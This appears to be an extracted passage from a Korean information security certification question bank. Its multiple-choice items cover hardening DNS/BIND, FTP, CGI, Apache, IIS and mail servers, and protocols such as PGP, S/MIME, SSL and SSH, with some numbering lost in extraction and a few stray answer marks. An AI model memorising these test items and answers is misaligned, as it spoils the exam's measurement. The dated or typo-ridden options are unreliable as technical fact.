웹서버에 포함되어 있는 견본 프로그램을 참고하며 서버를 운영한다. 3 불필요한 서비스는 사용하지 않는다. 4 IPSEC 등을 이용하여 포트 공격 등을 차단한다. 1 Zone Transfer 2 DNS(Domain Name Server) Notify 3 TSIG(Transaction Signature) 4 Non-Recursive 165
166 271. 리눅스 서버를 사용하여 인터넷에서 누구나 공개 적으로 접근이 가능한 웹 서비스를 제공하려고 한다. 이때 보안상의 문제점을 고려하여 제공해야 할 서비스 를 선택해야 하는데 설치 시 웹서버에 필요 없는 몇몇 서비스들이 설치가 되었다고 한다. 아래 보기 중 웹서 비스를 위해 제거하지 않아도 된다고 생각되는 것은? 1 웹서버 관리자가 자료를 쉽게 Upload/Download할 수 있도록 FTP 서비스를 제공한다. 2 특정 사용자의 정보(사용자 명, 홈 디렉터리 등)를 알려주는 기능을 제공하기 위해 fingerd를 제공한 다. 3 원격 호스트로부터 export된 파일 시스템을 마운트 해서 자유롭게 사용할 수 있도록 NFS를 제공한다. 4 원격 호스트에서 명령을 실행하거나 상호 작용할 수 있도록 하는 R 서비스(rsh, rcp 등)를 제공한다 chroot에 대한 설명으로 옳지 못한 것을 모두 고 르시오? 1 chroot는 새로운 root 디렉터리를 설정하여 chroot 된 프로세서는 이 디렉터리의 하위로만 접근할 수 있도록 한다. 2 접근할 수 있는 IP 대역을 설정할 수 있다. 3 chroot는 ftp 및 dns의 운영에도 사용된다. 4 chroot는 현재 CGI 프로그램의 사용자와 소유자를 검사하여 실행 제한을 한다 전자우편( )의 노출 방지를 위하여 고려할 수 있는 방안은 무엇인가? 1 전자서명 및 메시지 다이제스트 알고리즘(Message Digest Algorithm) 2 메시지 다이제스트 알고리즘(Message Digest Algorithm) 및 메시지의 암호화(Encryption) 3 메시지의 암호화(Encryption) 및 채널(Channel)의 암호화 4 채널(Channel)의 암호화 및 메시지 다이제스트 알 고리즘(Message Digest Algorithm) 274. DNS(Domain Name Service)의 dynamic update 에 대해 틀린 것은? 1 bind 8.x부터 지원된다. 2 실시간 레코드 변경에 유용하게 사용된다. 3 allow-update 옵션을 사용해서 허가할 도메인을 설 정한다. 4 default로 설정되어 있지 않다 DNS(Domain Name Service)는 취약점이 지속적 으로 발생되는 서비스이다. DNS의 보안 설정으로 올 바르지 않은 것은? 1 zone transfer를 제한한다. 2 dynamic update는 IP 혹은 TSIG key를 사용해서 제한한다. 3 recursion 모드로만 사용한다. 4 가능하다면 DNSSEC 기능을 사용한다 안전한 TFTP(Trivial File Transfer Protocol)의 서 비스를 하기 위한 설명으로 틀린 것은? 1 TCP Wrapper를 사용하여 접근할 수 있는 호스트 를 제한한다. 2 SUN인 경우 /etc/inetd.conf 파일에서 -s 옵션을 주 어 사용할 수 있는 디렉터리를 제한한다. 3 tftp dgram udp wait root /usr/etc/in.tftpd. in.ftfpd -s /tftpboot 4 /etc/tftpuser 파일에서 접근 가능한 사용자를 제한 한다 IIS(Internet Information Server) 서버를 안전하게 운영하기 위한 설정 중 올바르지 않은 것은? 1 NT 서버에서 제공하는 기본 공유를 제거한다. 2 IIS 디렉터리를 포함한 모든 파일을 읽고 실행 권한 으로 설정한다. 3 IIS에 기본적으로 제공되는 samples 파일을 삭제한 다. 4 NT 서버에서 제공하는 Null Session을 제거한다 메일서버로 가장 많이 사용되는 sendmail에서 exploiting을 탐지하기 위한 log level은? 메일 서버를 안전하게 운영하는 방법 중 틀린 것 은? 1 최신 버전의 메일 서버 프로그램을 사용한다. 2 POP을 이용할 때에는 SSH와 같은 암호화 도구와 함께 사용한다. 3 spammer를 막기 위한 방안을 강구한다. 4 인증된 사용자만 25번 포트를 쓰도록 침입차단시스 템에서 설정한다. 166
167 280. CGI를 사용할 때 보안상 고려해야 할 사항이 아 닌 것은? 1 cgi-bin 디렉터리의 허가권을 755 혹은 751로 한 다. 2 perl을 사용해서 시스템의 정보를 얻기 위해서는 eval, exec, open()만을 사용한다. 3 defaults cgi script를 제거한다. 4 CGI Wrapper를 사용한다 인터넷 응용 서비스 중 원격지에서 해당 서버의 쉘에 로그인할 수 있어 외부 비인가자가 리모트 공격 시 주로 사용하는 프로토콜은 무엇인가? 1 TELNET 2 SNMP 3 POP3 4 HTTP 282. 다음 중 침입자의 침해사고 방지를 위한 웹서버 운영 방안 중 옳지 않은 것은? 1 Syslog나 access_log를 주기적으로 백업하고 파일 퍼미션 접근제어 설정을 한다. 2 침입차단시스템 설정 시 외부에서 웹 서비스에 대 한 접근을 허용하도록 Ruleset 설정을 한다. 3 웹서버의 관리콘솔 접근제어 설정을 한다. 4 외부에서 웹서버 관리를 한다 스팸 메일(Spam Mail)로 분류될 수 있는 것을 모 두 고르시오? 1 수신자가 원하지 않는 상업광고 및 사이트 소개 2 행운의 편지 3 메일 폭탄 4 자신이 수신에 동의한 상품 광고 메일 284. 전자메일의 보안을 위하여 사용되고 있는 PGP(Pretty Good Privacy)와 S/MIME (Secure/Multipurpose Internet Mail Extension)에 대한 설명으로 틀린 것은? 1 PGP 메시지는 메시지 요소, 서명 요소, 세션키로 구성된다. 2 PGP는 메시지 암호화, 디지털 서명, 압축, 분할 기 능 등을 제공한다. 3 S/MIME에서 사용자는 키 생성, 등록, 인증서 저장 과 검색을 한다. 4 S/MIME은 메시지 기밀성, 무결성, 사용자에 대한 인증을 제공하나 송신자에 대한 부인방지 기능은 없다 모든 인터넷 전자 메일은 RFC 822에서 기술하고 있는 단순 텍스트 메시지(simple text message) 포맷 을 기반으로 하고 있다. 설명으로 틀린 것은? 1 보여질 헤더 정보의 순서를 명시하고 있다. 2 헤더 정보가 반드시 메시지 본문 앞에 나타나야 한 다. 3 헤더의 요소가 점과 분리행(blank line)에 의해 분 리되어야 한다. 4 분리행(blank line)은 캐리지 리턴(CRLFCRLF)으로 정의한다 전자우편( )의 보안성을 향상시키기 위한 방 안으로 적합하지 않은 것은? 1 PEM(Privacy Enhanced Mail) 2 PGP(Pretty Good Privacy) 3 S/MIME(Secure Multipurpose Internet Mail Extensions) 4 DES(Data Encryption Standard) 287. MIME(Multipurpose Internet Mail Extensions)은 단순 텍스트 메시지(Simple text message)를 확장한 것이다 설명으로 옳은 것을 모두 고르시오? 1 단순 텍스트 메시지와 다른 점은 메시지에 임의의 바이너리 파일을 포함할 수 있다는 것이다. 2 ASCII 텍스트 범위 안에서 바이너리 데이터를 인코 딩하여 인터넷 텍스트 메시지에 포함한다. 3 MIME의 헤더는 메시지 헤더와 부분 헤더로 구성되 어있다. 4 MIME 부분 헤더는 메시지 본문에 자리하며 다중 부분 메시지 각 부분의 컨텐츠를 서술한다 MIME(Multipurpose Internet Mail Extensions) 헤 더 필드 설명으로 틀린 것은? 1 Content-Type : 디스플레이를 위해 MUA가 메시지 를 파싱할 수 있도록 메시지에 있는 데이터의 유 형을 식별한다. 2 Content-Type : 헤더가 지정되지 않으면, 메시지를 US-ASCII 평문 텍스트로 가정한다. 3 Content-Transfer-Encoding : 메시지나 메시지 부분 에서 수행되는 인코딩 유형을 보여주고 그에 따른 디코딩 방법에 관한 정보를 제공한다. 4 Content-Transfer-Encoding : Binary 값만을 가진다. 167
168 289. MIME(Multipurpose Internet Mail Extensions)의 경계(boundaries)는 MIME 메시지 부분들 사이의 경계 를 정의하는 7비트 US-ASCII 테스트 스트링이다. 포함 되지 않는 것은? 1 ASCII 제어 문자 또는 공백 2 하이픈(-) 3 알파벳과 문자로 된 US-ASCII 문자 4 다른 곳에서 나타나지 않을 문자 시퀀스 290. MIME(Multipurpose Internet Mail Extensions)에 서 기본적으로 요구하는 사항이 아닌 것은? 1 MIME-Versions 헤더 2 Content-Type 헤더 3 Content-Transfer-Encoding 헤더 4 Content-ID 291. POP(Post Office Protocol)과 IMAP(Internet Message Access Protocol)은 원격서버로부터 전자 메 일을 검색하는 서비스이다 아래 설명 중 옳지 않은 것 은? 1 일반적으로 POP MUA(Mail User Agent)가 IMAP MUA(Mail User Agent)보다 빠르다. 2 POP은 메일 내용을 메일서버에서 로컬 컴퓨터로 전송하여 로컬에서 저장한다. 3 대부분의 IMAP은 모든 메시지를 메일서버에 저장 한다. 4 POP과 IMAP은 TCP 서비스 포트(Port) 110번을 사 용한다 S/MIME(Secure/Multipurpose Internet Mail Extension)에서 제공할 수 있는 보안 기능은? 1 메시지 기밀성 (Confidentiality) 2 메시지 무결성 (Integrity) 3 사용자 인증 (Authentication) 4 송신 부인방지(Nonrepudiation) 293. S/MIME(Secure/Multipurpose Internet Mail Extension)의 메시지 구성의 설명으로 옳지 않은 것은? 1 봉인된 데이터(Enveloped Data) : 암호화된 컨텐츠 타입과 암호화된 암호화-컨텐츠 암호키 (Encrypted-Content Encryption Key)로 구성되어 있다. 2 서명된 데이터(Signed Data) : 메시지 다이제스트 값을 서명자의 개인키로 암호화하여 형성된 디지 털서명이다. 3 클리어 서명 데이터(Clear-signed Data) : 서명된 데 이터와 컨텐츠의 디지털 서명으로 구성된다. 4 서명과 봉인된 데이터(Signed and Enveloped Data) : 암호화된 컨텐츠 타입을 서명할 수 없어 컨텐츠 타입을 서명하고 암호화의 순서로 구성된 다 POP3(Post Office Protocol)의 설명으로 옳지 않 은 것은? 1 메일서버에서 메시지를 다운로드할 때에 이용된다. 2 IMAP4와는 달리 POP3은 서버에서 메일 메시지의 직접 조작을 허용하지 않는다. 3 POP3는 IMAP4와는 다르게 메일 발송수단을 제공 한다. 4 POP3에서는 MD5에 기초한 더 안전한 인증방법을 사용할 수 있다 DNS(Domain Name Service)의 Record Type 중 메일과 관련된 것은? 1 SOA 2 PTR 3 MX 4 WKS 296. DNS(Domain Name Service)의 Zone Transfer에 대해 올바르지 않은 것은? 1 port 53번을 사용한다. 2 TCP 프로토콜을 사용한다. 3 syslog에서 named-xfer 를 포함한 로그를 남긴다. 4 DNS cache 서버와 Primary 서버 사이에 주로 발생 한다. 168
169 297. FTP는 파일 전송 서버이다. FTP 설정파일인 ftpusers 파일에 등록된 사용자들은 FTP로의 접근을 불허한다. Anonymous FTP를 제공하는 FTP 서버의 /etc/ftpusers 파일에 일반적으로 포함되어야 하는 사 용자를 모두 고르면? 1 uucp 2 root 3 ftp 4 daemon 298. FTP는 파일 전송 서버이다. ~ftp/etc/passwd에 포 함되지 않아야 할 항목을 모두 고르면? 1 1 listen 2 root 3 ftp 4 /etc/passwd의 일반계정에 대한 entry 299. CGI(Common Gateway Interface)는 외부 프로그 램과 웹 서버(HTTP Server) 간의 연결 역할을 하기 위 한 규약이다. CGI의 보안 취약점에 대한 설명 중 옳지 않은 것은? 1 업로드 컴포넌트의 보안 취약점만이 존재한다. 2 Invalid data 입력으로 예기치 않은 작동이 일어날 수 있다. 3 Server 내 프로그램을 악용하여 Malicious Code나 Shell Command를 실행시킬 수 있는 가능성이 존 재한다. 4 필요 이상으로 너무 많은 권한을 가질 수 있다 CGI는 Common Gateway Interface의 약자이다. 외부 프로그램과 웹서버(HTTP Server) 간의 연결 역할 을 하기 위한 규약이 CGI이다. CGI의 Security 설정 중 옳지 않은 것은? 1 CGI 컴파일 시 루트 권한으로 컴파일하여 일반 계 정이 실행할 수 없도록 설정 compiled cgi file : -rwx- 2 cgi-bin/ 디렉터리를 711, drwx--x--x로 권한 부여 3 cgi script file : -rwxr-xr-x 로 설정 4 Shell Command 실행 시 기본 폴더로 지정 system( ls /home/man ); 301. 아파치 웹서버는 access.conf 파일을 통하여 호스 트 기반의 네트워크 접근 제어기능을 제공한다. 아래 내용은 아파치 웹서버가 설치된 리눅스 시스템의 access.conf 파일의 일부분을 보여주고 있다. 내용에 대한 설명으로 옳지 않은 것은? #Controls who can get stuff from this server. order deny, allow allow from security.net deny from all 1 order는 allow/deny 규칙이 적용된 순서를 제어하 는 데 사용하며, allow, deny나 deny, allow 또는 mutual-failure의 세 가지 옵션이 지원된다. 2 위와 같은 경우, 연결 요구가 들어오면 deny 지시 문을 먼저 확인 처리하고 다음으로 allow를 확인 처리한다. 3 allow/deny는 연결을 위한 호스트를 제어하는데 사 용되며 all, none, list의 세 가지 옵션이 가능하다. 4 security.net은 호스트가 아닌 도메인으로 설정이 되 어있기 때문에 연결 요구를 받아들일 수 없다 DNS 서버인 BIND 서버 운영 시 해당 서버의 버 전 정보를 보여주지 않기 위해서는 다음과 같이 설정 한다. 아래의 내용을 설정하는 파일은? options { directory "/var/named"; version "x.x.x"; }; 1 /etc/inetd.conf 2 /etc/named.conf 3 /etc/resolv.conf 4 /etc/nscd.conf 303. 다음 중 Windows의 DNS 서버를 관리하는 방법 으로 적절치 않은 것은? 1 관리 그룹에 승인된 멤버만을 소속시킨다. 2 영역 전송(Zone Transfer)을 제한한다. 3 효과적인 관리를 위해 외부 DNS 서버와 내부 DNS 서버를 통합한다. 4 항상 최신 보안패치를 설치한다. 169
170 304. DNS는 인터넷의 기반이 되는 주요 서버이면서 조직의 필수적인 서비스로 Firewall에서 흔히 개방해놓 는 포트이기 때문에 공격자로부터 주요 공격목표가 될 수 있기 때문에 주의가 필요한 서비스이다. 아래 DNS 의 설정파일인 named.conf 파일에 대한 설명으로 옳 지 않은 것은? ====== Primary master name server의 named.conf 설정파일 ====== key huskymo-tornado. { algorithm hmac-md5; secret "mzimnouyqpmnwsdzrx2enw==; }; server { transfer-format many-answers; key { huskymo-tornado ; } ; }; zone "test.co.kr" { type master; file "db.test.co.kr"; update-policy { grant self A; } ; allow-transfer { ; } ; }; 1 Zone 데이터에 대한 인증과 검증을 위한 Transaction Signature(TSIG)라는 확장된 기능을 사 용하기 위한 설정이 되어 있다. 2 클라이언트에게 DNS 서비스를 제공하기 위한 Recursive 질의를 허용하도록 설정이 되어 있다. 3 allow-transfer 설정을 사용하여 Zone 데이터를 획 득할 수 있는 시스템을 제한하도록 설정이 되어 있다. 4 Dynamic Updates를 제한하기 위한 설정이 되어 있 다 DNS의 기능을 이용해 좀 더 유동적이고 발전된 형태의 메일 환경을 구축할 수 있도록 하기 위하여 MX(Mail Exchange)레코드를 사용한다. 설명으로 옳지 않은 것은? 1 MX는 그 도메인 네임의 메일이 최종적으로 전달될 호스트 또는 그 호스트로 메일을 중계해주는 다른 호스트를 의미한다. 2 MX에는 메일 라우팅 루프(loop)를 방지하기 위해 서 우선순위(preference) 항목을 둔다. 3 메일 익스체인저(Mail Exchanger)로 지정된 호스트 는 주소 레코드를 가지고 있을 필요가 없다. 4 MX 레코드는 언제나 메일 익스체인저(Mail Exchanger)의 전형적인(canonical)네임을 사용해야 한다(로컬 호스트의 별명은 검사하지 않는다) DNS를 관리하던 중 아래와 같은 메시지를 출력 하는 것을 발견하였다. 대처 방안으로 가장 적당한 것 은? May 21 19:56:36 wormhole named-xfer[30420]: SOA TSIG verification from server [ ],Zone sis.or.kr : BADTIME (-18) 1 해커에 의해 NTIFY 알림을 Second DNS로 보내 DoS(Denial of Service)공격을 하고 있는 것으로 판 단하여 마스터 DNS의 점검을 시도하였다. 2 통신하는 네임서버 간에 설정한 Key가 틀리기 때문 에 발생한 것으로 간주하여 키를 서로 맞추어 문 제 해결을 시도한다. 3 통신하는 네임서버 간 TSIG가 설치되어 있으며 설 정시간이 틀리기 때문에 발생한 것으로 생각하여 NTP(Network Time Protocol)을 이용하여 문제 해 결을 시도한다. 4 TTL(Time to Live)값이 설정되어 있지 않은 것으로 생각하여 기본 TTL을 설정해야 한다 영역 포워드(Forward Zone) 파일을 구성하는 RR(Resource Records)의 설명으로 옳지 않은 것은? 1 SOA(Start Of Authority): 해당 도메인에 대해 네임 서버가 모든 리소스 레코드 권리를 가지고 있음을 표시 2 MX(mail Exchanger): 해당 도메인으로 오는 메일을 처리할 메일 서버를 지정할 때 사용 3 HINFO(Host Information) : 레코드 호스트 정보를 나타내는 것으로 하드웨어 또는 CPU 정보를 나타 내는 부분과 호스트가 사용하고 있는 운영체제 정 보로 구성되어 있다. 4 CNAME(Canonical Name): 레코드 해당 도메인에 대한 네임서버를 지정 308. 안전한 DNS 서버를 운영하기 위하여 취한 행동 으로 옳지 못한 것은? 1 DNSSEC(DNS Security)을 사용한다. 2 Zone 데이터에 대한 인증과 검증을 위하여 TSIG(Transaction Signature)를 설정하여 주었다. 3 named를 실행할 때 관리자 권한(root)로 실행시킨 다. 4 Chroot(Change Root Directory)환경에서 Named를 실행시킨다. 170
171 309. BIND 설정에 정의될 수 있는 서비스 타입을 모 두 고르시오. 1 변환기 시스템(Resolver-Only System) 2 캐시 서버(Caching-only Server) 3 주 서버(Primary Server) 4 부 서버(Secondary Server) 310. DNS 공격을 통하여 해커는 유명 사이트(예, 다음 등)와 똑같은 내용으로 자신의 사이트를 만들고 접속 을 유도하여 접속자들의 개인정보를 수집할 수 있다. 이러한 공격을 막기 위한 서버의 설정이 아닌 것은? 1 recusion 모드의 해지 2 Named가 응답할 query를 제한 3 Named가 응답할 recursive query를 제한 4 named를 설행할 때 관리자 권한(Root)으로 실행 311. BIND는 TSIG(Transaction Signature)를 이용해 DNS 메시지를 안전하게 하는 기술을 지원한다. 설명 으로 옳지 못한 것은? 1 데이터에 대한 인증(Authentication)을 제공한다. 2 송신자와 수신자가 공유하는 하나 이상의 암호키를 설정하여야 한다. 3 데이터에 대한 무결성(Integrity)을 제공한다. 4 데이터 근원에 대한 부인 방지(non-repudiation)를 제공한다 아래의 BIND 공격 방법을 설명한 것 중 옳지 않 은 것은? 1 Zone Transfer : 공격에 성공하게 되면 해당 zone 의 zone file을 획득할 수 있고, 이 파일로부터 다 양한 정보를 얻을 수 있다. 2 Dynamic Update : zone에 있는 record를 지우고 새로운 정보를 추가하는 공격으로 Dynamic Update 기능은 모든 버전에서 지원되고 기본으로 허용하므로 named.conf 설정에서 allow-transfer를 설정하여 막아야 한다. 3 Buffer overflow(nxt, tsig bug) : bind가 root 권한 으로 실행될 경우 공격자에게 root 권한을 빼길 수 있다. 4 Address Spoofing : 공격에 성공하게 되면 공격자 는 유명 전자상거래 사이트와 똑같은 내용으로 자 신의 사이트를 만들고 일반 사용자가 접속하도록 유도한 뒤 사용자의 패스워드, ID 등의 정보를 수 집할 수 있다 안전한 FTP(File Transfer Protocol) 서비스를 하기 위한 설명으로 틀린 것은? 1 ftp 디렉터리를 만들고 소유주를 ftp로 한다. 2 ftp 디렉터리 밑에.rhosts 파일과.forward 파일을 만들 시 사이즈를 0로, 권한을 000로, 소유자를 root로 설정한다. 3 ftp/bin과 ftp/etc의 소유주는 root로 하고 권한을 111로 준다. 4 /incoming 디렉터리(업로드 할 수 있는)의 권한을 쓰기만 가능하도록 한다 Anonymous FTP Archive가 유닉스 시스템이라면 여러 가지 방법에 의해 공격당할 수 있다. FTP Archive 를 공격하는 방법은 ftp 데몬의 버그를 이용한 침입과 FTP Archive의 설정을 이용한 침입 크게 두 가지로 볼 수 있는데 위와 같은 공격에 대처하기 위한 FTP Archive 관리자들이 지켜야 할 보안 설정에 대한 설명 으로 맞지 않은 것은? 1 Anonymous 사용자의 루트 디렉터리 소유주는 루 트가 되어야 하며 퍼미션은 555로 하는 것이 좋다. 2 ftp/bin 디렉터리에는 FTP 서비스 시에 이용될 수 있는 프로그램이 위치하게 된다. 3 ftp/etc의 소유주도 루트로 해주며 이 퍼미션도 111로 해준다. 4 ftp/pub의 소유주는 이 FTP Archive를 관리할 사람 의 권한으로 해주고 퍼미션은 000로 해준다 TFTP는 Trivial-FTP의 약어로, 초기 개발 취지는 TFTP 서버를 부팅 서버 로 사용하기 위한 것이었다. 그러나 TFTP는 패스워드 없이 접속하여 파일을 가져올 수 있기 때문에 이로 인한 해킹 사고를 방지할 수 있 도록 설정에 신경을 써야 한다. 아래에서 보여주는 내 용은 /etc/inetd.conf 파일의 tftp에 대한 설정을 보여 주고 있다. 이에 대한 설명으로 옳지 않은 것은? tftp dgram udp wait root /usr/sbin/in.tftpd -s /home/kisa 1 tftp를 사용하지 않는다면 inetd.conf 파일 내에서 주석처리 혹은 이 행을 지워 버리는 것을 권장한 다. 2 위 설정은 tftp 접속시 /home/kisa 디렉터리 아래 뿐만 아니라 / 아래 모든 정보를 다 가져올 수 있 다. 3 -s 옵션을 설정한 것은 chroot()기능을 이용해 보안 상의 문제를 해결하기 위해서이다. 4 tftp 서버스를 제거하기 위해 시스템이 inetd 대신 에 xinetd를 사용한다면 /etc/xinetd.d/tftp 파일을 삭제하면 된다. 171
172 316. FTP(File Transfer Protocol)는 컴퓨터에서 다른 컴 퓨터로 파일을 전송하는데 사용된다. FTP에 대한 설명 으로 옳지 않은 것은? 1 FTP는 두 가지 분리된 TCP 연결을 사용한다. 2 클라이언트와 서버 사이에서 명령과 결과를 전달하 는 연결을 일반적으로 명령 채널이라고 하고 실제 파일과 전송되는 디렉터리 목록을 전달하는 것을 데이터 채널이라고 한다. 3 명령 채널을 서버측에서 21번 포트를 사용하고 클 라이언트 측에서는 1023번 이상의 포트를 사용한 다. 4 데이터 채널을 설정할 때 일반모드와 수동모드 두 가지 다른 방법이 있으며, 일반 모드, 수동모드 모 두 다 서버측에서는 데이터 채널로써 20번 포트를 사용한다 아래 내용은 아파치 웹서버 상태를 확인한 결과 이다. 내용 설명으로 옳지 않은 것은? [root@probank /root]# ps -ef grep httpd root Jul20? 00:00:05 /usr/local/apache/bin/httpd nobody Jul23? 00:00:02 /usr/local/apache/bin/httpd nobody Jul23? 00:00:01 /usr/local/apache/bin/httpd nobody Jul23? 00:00:01 /usr/local/apache/bin/httpd 1 아파치 웹 데몬 구동 시에는 자식프로세스의 User 와 Group으로 생성되었고 결과로 보아 nobody로 실행되고 있다. 2 위 내용은 ServerType이 Standalone 방식이며, 아 파치의 실행이 root 권한으로 실행이 되었을 때 유 효한 것이다. 3 위의 결과는 만약 시스템에 nobody user가 없다면 새로 생성을 해야 한다. 4 nobody 이외의 다른 사용자 ID를 원하면 서버에 권한이 적은 ID를 생성하여 사용하는 것이 좋다 Apache 웹서버에 대한 리모트 스캔 시 웹서버의 버전이 보이지 않도록 설정하기 위해서는 httpd.conf 파일에서 설정해야 한다. 다음 중 추가해야 하는 내용 을 고르면? 1 ServerTokens Minimal 2 ServerTokens OS 3 ServerTokens ProductOnly 4 ServerTokens Full 318. 안전한 웹서버를 설치하기 위한 방법으로 chroot 라는 시스템 함수를 사용하여 새로운 루트 디렉터리를 설정하도록 한다. 아래에서 chroot에 대한 설명으로 옳지 않은 것은? 1 chroot된 디렉터리를 루트 디렉터리로 인식되기 때 문에 불필요한 파일이나 디렉터리로의 접근을 제 한할 수 있다. 2 설치에 드는 시간이 짧고 간편하다. 3 chroot된 디렉터리를 벗어나지 않고 동작하기 때문 에 정기적으로 백업을 받아둔다면 빠른 시간 내에 복구시킬 수 있다. 4 root 권한의 프로세스가 nobody 권한의 자식 프로 세스를 생성시켜서 컨트롤을 넘기기 전에 공격당 하더라도 chroot된 디렉터리를 벗어날 수 없기 때 문에 시스템에 큰 영향을 미치지 못한다 Apache 웹서버 보안 설정에 대한 설명 중 옳지 않은 것은? 1 Apache의 환경 설정 파일인 httpd.conf의 permission을 -rwx---r--와 같이 설정함으로써 other에게 읽기 권한만 주도록 하는 것이 좋다. 2 Apache에서 해당 페이지에 접근하기 위한 인증 기 능을 사용하기 위해서는 http.conf 파일에서 AllowOverride AuthConfig로 설정을 하고.htaccess 파일을 생성해서 사용할 수 있다. 3 Apache에서.htaccess에는 인증 정보가 들어있는 경우가 빈번하므로 보안상의 이유로 이 파일에 대 한 접근을 불허해야 한다. 4 Apache 웹서버에서 지원하는 서버 타입은 standalone 밖에 없으며 httpd.conf 파일에서 ServerType 지시자를 사용해 지정 가능하다 DNS 서버는 호스트 이름과 IP 주소를 매치시키 는 서비스를 제공한다. DNS 서버는 침입자가 정보 수 집을 위해서 공격하는 가장 빈번한 목표 중 하나인데, 다음 중 그 이유가 아닌 것은? 1 DNS 서버는 대상 네트워크에 속한 호스트들의 목 록을 가지고 있다. 2 DNS 서버에 대한 통제권을 획득할 경우, 특정 호 스트로의 연결을 리다이렉션(redirection)시킬 수 있다. 3 상위 DNS 서버에 대한 권한을 획득할 경우 하위 DNS 서버에 대한 권한도 쉽게 획득할 수 있다. 4 대부분 패킷 필터링 규칙에서 53/TCP, 53/UDP 포 트는 열려 있다. 172
173 322. 웹서버를 운영하고 있는 시스템의 관리자가 로 그 점검을 하다가 IP 에서 지속적인 스 캔 공격을 하고 있는 것을 발견했다. 해당 IP는 국내에 서 관리하고 있는 IP로 추정되며, 해당 IP의 관리자에 게 경고 메일을 보내고자 한다. 해당 IP 관리자의 이메 일 주소를 찾으려면 다음 중 어느 사이트에서 가능한 가? whois.krnic.or.kr 버퍼 오버플로우를 예방하는 방법 중 프로그래머 가 코딩 시 입력버퍼의 경계값을 검사하는 안전한 함 수를 사용하는 방법이 있다. 다음 중 여기에 해당하지 않는 함수는? 1 strncpy() 2 snprintf() 3 fget() 4 getopt() 324. SSL(Secure Socket Layer)은 웹환경에서의 데이터 암호화를 위해 개발된 프로토콜이다, 다음 중 SSL에 대한 설명으로 올바르지 않은 것은? 1 TCP/IP 기반의 모든 서비스에 사용 가능하다. 2 웹브라우저에서 shttp//'를 사용한다. 3 통신채널의 양방향 암호화를 지원한다. 4 X.509 인증서를 지원한다 관리자가 일반적으로 FTP 혹은 telnet을 사용하면 평문(Plaintext) 형태의 통신이 이루어져 공격자의 스니 핑(Sniffing) 위험에 노출되게 된다. 다음 중 이에 대한 대안으로 사용할 수 있는 솔루션은 무엇인가? 1 Secure HTTP 2 SET 3 SSH 4 GP 326. WWW 브라우저와 WWW 서버간에 안전하게 데 이터를 주고받을 수 있도록 하는 표준 프로토콜로 인 증, 암호화 기능이 있는 것은? 1 PGP (Pretty Good Privacy) 2 RSA (Rivest Shamir Adelman) 알고리즘 3 MD5 (Message Digest Algorithm) 4 SSL (Secure Sockets Layer) 327. PGP(Pretty Good Privacy)는 전자우편( ) 보안 을 위한 프로그램이다. 다음중 PGP에 대하여 올바르게 설명한 것은? 1 PGP는 표준 규약이다. 2 PGP는 제품명이다. 3 PGP는 다른 보안 프로그램과 상호 연동될 수 있다. 4 PGP는 서로 다른 하드웨어 플랫폼에 적용될 수 없 다 SSH(Secure Shell)은 네트워크 상에서 이루어지는 데이터 전송 시 보안상 허점을 해결하고자 제시된 방 법이다. SSH에 관한 다음 설명 중 옳지 않은 것은? 1 네트워크 데이터 통신의 암호화를 수행 2 송수신 시의 데이터 압축(Compression)을 실행 3 호스트간의 X.11 통신의 통신 보안을 실행 4 X.25에서의 데이터 통신 암호화 329. SSH(Secure Shell)은 네트워크 상에서 이루어지는 데이터 전송 시 보안상 허점을 해결하고자 제시된 방 법이다. SSH의 방어 효과에 관한 설명 중 옳은 것은? 1 IP Spoofing 2 IP Source Routing 3 Buffer Overflow 4 중간 호스트에서 데이터 가로채기 330. 다음은 보안 프로토콜에 대한 설명이다. 다음의 내용이 설명하는 것은? (서버와 클라이언트 간에 인증으로 RSA 방식과 X.509 를 사용하고 실제 암호화된 정보는 새로운 암호화 소 켓 채널을 통해 전송하는 방식) 1 SSL(Secure Socket Layer) 2 S-HTTP 암호화 3 PEM(Privacy Enhanced Mail) 4 PGP(Pretty Good Privacy) 331. 다음 보안 프로토콜에 대한 설명이다. 다음의 내 용이 설명하는 것은? (HTTP 세션으로 주고받는 자료에 대한 암호화, 전자서 명 등의 보안서비스를 지원하는 프로토콜로 HTTP와 동일한 구조에서 동작한다.) 1 SSL(Secure Socket Layer) 2 S-HTTP 3 PEM(Privacy Enhanced Mail) 4 PGP(Pretty Good Privacy) 173
174 332. PGP(Pretty Good privacy)는 인터넷에 사용되고 있는 전자우편 보안 시스템이다. 다음 중 올바른 설명 이 아닌 것은? 1 Confidentiality 2 Message shadow 3 Authentication: Digital signature 4 Compatibility 333. SSL(Secure Socket Layer)에 대해 올바르지 않은 것은? 1 Netscape Communication에서 개발되었다. 2 인터넷에서 두 호스트의 TCP/IP를 암호화한다. 3 SHTTP와 동일한 기능을 제공한다. 4 HTTP, TELNET, FTP 등을 암호화하기 위해 사용된다 SSL과 TLS의 설명 중 올바르지 않은 것은? 2 1 SSL은 TCP/IP에만 대응되나 TLS는 넷웨어, SPX, 애 플토크 같은 통신망 규약에도 대응된다. 2 SSL은 RSA의 공개키 암호화 시스템을 사용하지 않 는다. 3 SSL에 비해 TLS는 오류메시지 처리기능이 다소 개 선됐다. 4 TLS는 강력한 암호화를 실현했다 DNS를 아무런 제한 없이 Recursive 모드로 동작 하게 되면 spoofing 공격에 취약하게 된다. 따라서 DNS를 설정할 때 spoofing 공격에 대비하기 위한 보 안설정을 하여야 되는데 다음 중 이러한 보안 설정에 해당하지 않는 것은? 1 recursion 모드를 해제한다. 2 named가 응답할 query를 제한한다. 3 named가 응답할 recursive query를 제한한다. 4 Chroot (Change Root Directory) 환경에서 named 를 실행시킨다 FTP 서버 운용과 관련된 침입차단시스템 정책 중 틀리게 설명된 것은 무엇인가? 1 FTP 서버가 Passive mode라면 Destination Port 1024 이상/TCP을 허용해야 하기 때문에 보안상 위 험하다. 2 FTP 서버가 Active mode라면 침입차단시스템의 보 안 정책에서 All_Internet -> FTP Server 로 목적지 포트 21/TCP를 열어줘야 한다. 3 FTP 서버가 Active mode라면 침입차단시스템의 보 안 정책에서 FTP Server -> All_Internet으로 source port 20/TCP를 허용해야 한다. 4 FTP 서버가 Passive mode라면 침입차단시스템의 보안 정책에서 All_Internet -> FTP Server로 destination port 21/TCP, 20/TCP를 열어줘야 한다 서버와 클라이언트 간에 인증으로 RSA방식과 X.509를 사용하고 실제 암호화된 정보 \는 암호화 소 켓 채널을 통해 전송하는 방식은? 1 PEM (Privacy Enhanced Mail) 2 SSL (Secure Socket Layer) 3 PGP (Pretty Good Privacy) 4 S-HTTP 336. 전자우편을 통한 IP 추적 방법의 한 방법으로 메 일헤더 중 ()항목을 분석함으로써 실제 메일을 발송 시 킨 사용자의 메일 주소를 